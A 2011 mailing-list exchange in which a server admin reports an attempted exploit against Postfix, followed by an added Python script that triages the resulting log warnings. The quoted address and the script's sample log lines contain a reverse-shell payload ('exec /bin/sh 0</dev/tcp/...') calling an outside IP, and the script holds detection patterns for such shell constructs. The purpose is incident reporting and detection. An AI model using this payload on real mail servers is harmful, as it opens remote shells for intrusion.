No worries,

Reading about attempted exploits like this is often helpful for people, as it shows them that there is a very real threat out there to servers that are not up to date. I also find it interesting to see what they get up to these days...

Daniel

On 11 February 2011 11:13, Alastair Sherringham <sherringham@gmail.com> wrote:
Thanks. All seems OK as far as I can see (AIDE check etc.) and I am up
to date with security. I like to put this sort of thing in the open
and ask, at least if it's "unusual" (to me). Thanks for the follow-up.


On 11 February 2011 11:07, Daniel Case <danielcase10@gmail.com> wrote:
> It seems the user was trying to get a shell delivered to their TCP stream. I
> have heard of an exploit like this, it was plugged quite quickly though so
> as long as you are up to date you should be fine.
> By the looks of it postfix blocked it as an illegal address so I wouldn't
> worry too much, it will have delivered it as a normal email :)
> Daniel
>
> On 11 February 2011 09:29, Alastair Sherringham <sherringham@gmail.com>
> wrote:
>>
>> I received an interesting email today. I only noticed because I had
>> logged in SSH and got the "you have new email" message. Reading via
>> "mail", I see :
>>
>> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
>> 1>&0 2>&0"@calliope.bitfolk
>>
>> Obviously some sort of possible exploit. The IP address 87.106.250.176
>> is Germany (1&1 Internet).
>>
>> Postfix reported :
>>
>> warning: 36FE51381A3: address with illegal extension: root+:|exec
>> /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
>>
>> But it was delivered. I hope nothing bad has happened. (I am running
>> AIDE as we speak and digging around.)
>>
>> Cheers,
>>
>>
>> --
>> Alastair Sherringham
>> http://www.sherringham.net
>>
>
>



--
Alastair Sherringham
http://www.sherringham.net
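
Added example, not part of any poster's message: a log triage sketch for the Postfix "address with illegal extension" warning quoted in this thread. It pulls out the queue ID and flags shell constructs in the address extension. The syslog prefix, queue IDs, addresses and indicator names in the sample are constructed assumptions.

```python
import re

# Matches the warning text quoted in the thread. Whatever precedes
# "warning:" (syslog prefix, assumed here) is ignored.
WARNING_RE = re.compile(
    r"warning: (?P<qid>[0-9A-F]+): address with illegal extension: (?P<addr>.+)$"
)

# Shell constructs that have no place in a recipient address extension.
# The indicator names are this example's own labels.
INDICATORS = {
    "pipe": re.compile(r"\|"),
    "dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "shell_exec": re.compile(r"\bexec\b|/bin/(?:ba)?sh\b"),
    "fd_redirect": re.compile(r"\d?[<>]&?\d?"),
}

def triage(lines):
    """Return one finding per 'illegal extension' warning, with matched indicators."""
    findings = []
    for line in lines:
        m = WARNING_RE.search(line.rstrip("\n"))
        if not m:
            continue
        localpart, _, extension = m.group("addr").partition("+")
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(extension))
        remote = re.search(r"/dev/tcp/([^/\s]+)/(\d+)", extension)
        findings.append({
            "queue_id": m.group("qid"),
            "localpart": localpart,
            "indicators": hits,
            # Host and port the payload would have connected back to, if any.
            "callback": (remote.group(1), int(remote.group(2))) if remote else None,
        })
    return findings

# Constructed sample log lines (documentation IP ranges, made-up queue IDs).
SAMPLE_LOG = [
    "Feb 11 09:29:01 mx postfix/local[2211]: warning: 1A2B3C4D5E6: "
    "address with illegal extension: "
    "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/4444 1>&0 2>&0",
    "Feb 11 09:30:12 mx postfix/local[2212]: warning: 6E5D4C3B2A1: "
    "address with illegal extension: bob+:list",
    "Feb 11 09:31:40 mx postfix/smtpd[2213]: connect from unknown[198.51.100.7]",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A finding with a non-empty indicator list is the kind worth following up with the queue ID in the rest of the mail log and an integrity check such as the AIDE run mentioned above.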